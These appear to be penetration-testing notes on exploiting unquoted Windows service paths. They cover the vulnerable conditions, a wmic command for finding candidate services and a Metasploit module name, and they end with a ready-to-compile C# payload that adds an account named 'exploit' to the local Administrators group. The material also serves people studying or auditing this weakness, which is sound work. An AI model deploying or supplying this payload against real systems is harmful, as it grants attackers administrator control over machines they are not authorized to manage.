Process
When a service is launched the function CreateProcess is called by the system with the IpApplicationName parameter.
Detection
To see if the host is vulnerable we can:
- List services running
- Service should have the following specs:
- Automatic start on launch
- path should contain at least one space
- Path should not be enclosed by quotes
- Service is ran by Administrator or SYSTEM
- Attacker has sufficient right to edit one of the service’s parent folder
cmd - wmic service get name,pathname,startmode
Metasploit
exploit/windows/local/trusted_service_path
using System;
using System.IO;
using System.Text;
public class Program
{
static public void Main()
{
string strCmdText = "strCmdText";
strCmdText =" /C net localgroup Administrators exploit /add";
System.Diagnostics.Process.Start("CMD.exe", strCmdText);
}
}